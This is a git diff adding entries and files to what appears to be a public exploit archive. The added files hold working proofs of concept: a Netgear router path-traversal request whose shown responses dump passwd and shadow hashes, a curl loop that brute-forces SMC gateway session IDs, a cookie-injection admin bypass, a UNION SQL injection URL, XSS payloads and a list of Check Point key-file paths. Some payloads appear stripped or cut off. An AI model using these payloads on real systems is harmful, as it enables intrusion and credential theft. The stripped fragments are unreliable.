diff --git a/files.csv b/files.csv index 64605e996..2dff0d020 100755 --- a/files.csv +++ b/files.csv @@ -26857,7 +26857,7 @@ id,file,description,date,author,platform,type,port 29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 - Multiple Cross Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0 29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0 29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 (.zip) - Crash PoC",2013-11-30,KAI,windows,dos,0 -29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution Using Admin Privileges",2013-11-30,BlackDream,php,webapps,0 +29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0 29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0 29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service Vulnerability",2007-05-01,"Derek Abdine",linux,dos,0 @@ -31766,6 +31766,7 @@ id,file,description,date,author,platform,type,port 35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0 +35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0 35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80 @@ -31805,3 +31806,14 @@ id,file,description,date,author,platform,type,port 35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0 35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0 +35314,platforms/linux/remote/35314.txt,"Wireshark <= 1.4.3 - '.pcap' File Memory Corruption Vulnerability",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 +35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 'custid' Parameter SQL Injection Vulnerability",2011-02-07,NoNameMT,php,webapps,0 +35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass Vulnerability",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0 +35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0 +35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0 +35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 +35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 +35321,platforms/php/webapps/35321.txt,"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability",2014-11-22,Vulnerability-Lab,php,webapps,0 +35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 +35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0 +35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 diff --git a/platforms/hardware/remote/35317.txt b/platforms/hardware/remote/35317.txt new file mode 100755 index 000000000..0f4e3e508 --- /dev/null +++ b/platforms/hardware/remote/35317.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/46224/info + +Multiple Check Point endpoint security products are prone to multiple information-disclosure vulnerabilities. + +Attackers can exploit these issues to harvest sensitive information that may lead to further attacks. + +http://www.example.com/conf/ssl/apache/integrity-smartcenter.cert +http://www.example.com/conf/ssl/apache/integrity-smartcenter.key +http://www.example.com/conf/ssl/apache/integrity.cert +http://www.example.com/conf/ssl/apache/integrity.key +http://www.example.com/conf/ssl/apache/smartcenter.cert +http://www.example.com/conf/ssl/integrity-keystore.jks +http://www.example.com/conf/ssl/isskeys.jks +http://www.example.com/conf/ssl/openssl.pem +http://www.example.com/conf/integrity.xml +http://www.example.com/conf/jaas/users.xml +http://www.example.com/bin/DBSeed.xml +http://www.example.com:8080/conf/ssl/apache/integrity-smartcenter.cert \ No newline at end of file diff --git a/platforms/hardware/webapps/35325.txt b/platforms/hardware/webapps/35325.txt new file mode 100755 index 000000000..29f2cf986 --- /dev/null +++ b/platforms/hardware/webapps/35325.txt @@ -0,0 +1,86 @@ +Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit + + +Vendor: NETGEAR +Product web page: http://www.netgear.com +Affected version: WNR500 (firmware: 1.0.7.2) + +Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves +your legacy Wireless-G network. It is a simple, secure way to share your +Internet connection and allows you to easily surf the Internet, use email, +and have online chats. The quick, CD-less setup can be done through a web +browser. The small, efficient design fits perfectly into your home. + +Desc: The router suffers from an authenticated file inclusion vulnerability +(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is +not properly verified before being used to include files. This can be exploited +to include files from local resources with directory traversal attacks. + +Tested on: mini_httpd/1.19 19dec2003 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5208 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php + + +16.11.2014 + +-- + + += 1 ============================================================= + +GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1 +Host: 192.168.1.1:8080 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us +Authorization: Basic YWRtaW46cGFzc3dvcmQ= +Connection: keep-alive + +--- + +HTTP/1.0 200 OK +Content-type: text/html +Cache-Control: no-cache +set-cookie: sessionid=7dc3268b; +set-cookie: auth=ok; +set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; + +#root:x:0:0:root:/root:/bin/bash +root:x:0:0:root:/root:/bin/sh +#tw:x:504:504::/home/tw:/bin/bash +#tw:x:504:504::/home/tw:/bin/msh + + += 2 ============================================================= + +GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1 +Host: 192.168.1.1:8080 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us +Authorization: Basic YWRtaW46cGFzc3dvcmQ= +Connection: keep-alive + +--- + +HTTP/1.0 200 OK +Content-type: text/html +Cache-Control: no-cache +set-cookie: sessionid=7dc3268b; +set-cookie: auth=ok; +set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; + +#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: +root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: +#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: +#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: diff --git a/platforms/linux/remote/35314.txt b/platforms/linux/remote/35314.txt new file mode 100755 index 000000000..f8e823624 --- /dev/null +++ b/platforms/linux/remote/35314.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/46167/info + +Wireshark is prone to a memory-corruption vulnerability because it fails to properly handle certain files. + +Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application. + +http://www.exploit-db.com/sploits/35314.pcap \ No newline at end of file diff --git a/platforms/multiple/remote/35316.sh b/platforms/multiple/remote/35316.sh new file mode 100755 index 000000000..6589d2e38 --- /dev/null +++ b/platforms/multiple/remote/35316.sh @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/46178/info + +The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability. + +An attacker can exploit this issue to gain unauthorized administrative access to the affected devices. + +#!/bin/bash +start=1267604160 +end=1267605960 +for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i +http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt +"1" ] then echo "Session ID Found: $i" +fi +if [ $(($i % 100)) -eq "0" ] +then echo "Currently at $i" +fi +done + diff --git a/platforms/php/webapps/35271.txt b/platforms/php/webapps/35271.txt new file mode 100755 index 000000000..79397474c --- /dev/null +++ b/platforms/php/webapps/35271.txt @@ -0,0 +1,26 @@ +# Title : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass) +# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com +# Home : http://milw00rm.com / its online +# Date : 17.11.2014 +# Demo : http://www.era.sn/courrier +# Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip +# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others + +you first go here: + +http://www.target.com/path/index.php?page=welcome.php + +you will go login.php, but if we change our cookie's with this exploit we will be login admin panel. + +exploit: + +javascript:document.cookie = "UserId=[username] ' or '; path=/"; + +or you edit your cookie's with "Cookies Manager" + +name = maarch +contents = UserId=username ' or ' +host = your target +path = /script_path/ + +and dont change other options its keep default. \ No newline at end of file diff --git a/platforms/php/webapps/35315.txt b/platforms/php/webapps/35315.txt new file mode 100755 index 000000000..b9bb49126 --- /dev/null +++ b/platforms/php/webapps/35315.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/46171/info + +Escortservice is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +Escortservice 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 +,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+ \ No newline at end of file diff --git a/platforms/php/webapps/35319.txt b/platforms/php/webapps/35319.txt new file mode 100755 index 000000000..8071509bf --- /dev/null +++ b/platforms/php/webapps/35319.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/46250/info + +WebAsyst Shop-Script is prone to a cross-site-scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + + +http://www.example.com/html/scripts/index.php?>[xss] + +http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2">&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export= \ No newline at end of file diff --git a/platforms/php/webapps/35320.txt b/platforms/php/webapps/35320.txt new file mode 100755 index 000000000..f4cc6c933 --- /dev/null +++ b/platforms/php/webapps/35320.txt @@ -0,0 +1,46 @@ +source: http://www.securityfocus.com/bid/46256/info + +ViArt Shop is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +ViArt Shop 4.0.5 is vulnerable; other versions may also be affected. + +1. http://www.example.com/admin/admin_product.php?category_id=0&item_id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E + +2.
+ + + +3. + \ No newline at end of file diff --git a/platforms/php/webapps/35321.txt b/platforms/php/webapps/35321.txt new file mode 100755 index 000000000..b4ec7283a --- /dev/null +++ b/platforms/php/webapps/35321.txt @@ -0,0 +1,260 @@ +Document Title: +=============== +Supr Shopsystem v5.1.0 - Persistent UI Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1353 + + +Release Date: +============= +2014-11-07 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1353 + + +Common Vulnerability Scoring System: +==================================== +3.1 + + +Product & Service Introduction: +=============================== +SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store. +Without installation and own webspace you can begin to create products and content right after the registration. With our +free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an +expert to work with the SUPR Shop. + +( Copy of the Vendor Homepage: http://de.supr.com/tour ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-11-05: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Supreme NewMedia GmbH +Product: Supr - Shopsystem Web Application 5.1.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application. +The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non +expired session or by local post inject. + +The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module. +Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link). +Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail +POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded. + +The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute. +Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected +locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link. + +The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. +Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction. +Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious +sources and application-side manipulation of affected or connected module context. + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] Dashboard > Settings > General > (setting_shopdetail) + +Vulnerable Parameter(s): + [+] blogname + [+] blog/shop slogan + [+] tags + +Affected Module(s): + [+] Dashboard (localhost:80/a/wp-admin/[x]) + + +Proof of Concept (PoC): +======================= +The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + + +PoC: Dashboard > Settings > General > (setting_shopdetail) + +